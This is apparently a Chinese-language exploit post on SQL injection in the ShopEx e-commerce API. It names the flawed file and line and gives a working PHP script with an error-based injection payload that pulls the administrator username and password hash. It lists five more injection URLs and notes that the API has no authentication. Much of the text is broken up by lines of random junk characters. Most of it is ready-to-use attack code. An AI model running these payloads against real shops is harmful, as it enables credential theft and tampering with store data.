|
|
缺陷文件:\core\api\payment\2.0\api_b2b_2_0_payment_cfg.php% v+ ?9 x* \* Y7 u* y) ~' M
core\api\payment\1.0\api_b2b_2_0_payment_cfg.php
; W3 A) l. a' a2 D, a# r& }9 e1 \# C( B
第44行 $data['columns'] 未做过滤导致注入
1 m9 o8 y0 w. B* P
3 x9 t$ e4 h3 h1 r2 V<?php set_time_limit(0); ob_flush(); echo 'Test: http://localhost:808'."\r\n"; $sql = 'columns=* from sdb_payment_cfg WHERE 1 and (select 1 from(select count(*),concat((select (select (SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#&disabled=1'; $url='http://localhost:808/api.php?act=search_payment_cfg_list&api_version=2.0'; $ch = curl_init(); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_POSTFIELDS, $sql); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); flush(); $data = curl_exec($ch); echo $data; curl_close($ch); ?>外带一句 ShopEx对API操作的模块未做认证,任何用户都可访问,攻击者可通过它来对产品的分类,类型,规格,品牌等,进行添加,删除和修改,过滤不当还可造成注入.
: c( y+ }# L7 \% G i( y! q% ^ }- q+ d. ]- F
注射1:* T/ r+ M' _( x/ b4 g0 _
1 }: b" [: F4 |, y! W/ I
http://www.0day5.com/api.php POST act=search_sub_regions&api_version=1.0&return_data=string&p_region_id=22 and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)#
" f: |" Z2 |& Y- E0 d8 p: X! k$ Y8 y" R3 c! x! y
注射2:9 U' h/ L) M' ~8 K6 A
http://www.0day5.com/shopex/api.php act=add_category&api_version=3.1&datas={"name":"name' and 1=x %23"}9 ]* W3 C+ }6 c/ l7 H K% `3 H
# l% j; b; Z3 A注射3:- U. _0 D8 p' d
http://www.0day5.com/shopex/api.php act=get_spec_single&api_version=3.1&spec_id=1 xxx
$ h/ V% I$ k5 R* D5 n# w' L2 l注射4:: q/ B% o' ~0 v$ L7 c2 j
7 p# {# H& I3 ~http://www.0day5.com/shopex/api.php act=online_pay_center&api_version=1.0&order_id=1x&pay_id=1¤cy=1. K1 m8 [$ R' Z
" @, C/ A8 R1 S, i& z; ?1 W
, s# I6 W* W* f. ^
注射5:6 \4 J! F/ E% a7 X y
http://www.0day5.com/shopex/api.php act=search_dly_h_area&return_data=string&columns=xxxxx2 j( E3 G2 j( _& K
8 j% I7 J6 m. [- Z3 l, k( H
* E" P( Q. e' t1 J7 o/ ]/ @9 R* A7 P n/ x
! w' s7 P* D2 d3 n
6 v1 _* }$ O5 `7 Z
6 f, z- j4 n" Z7 T& i |
|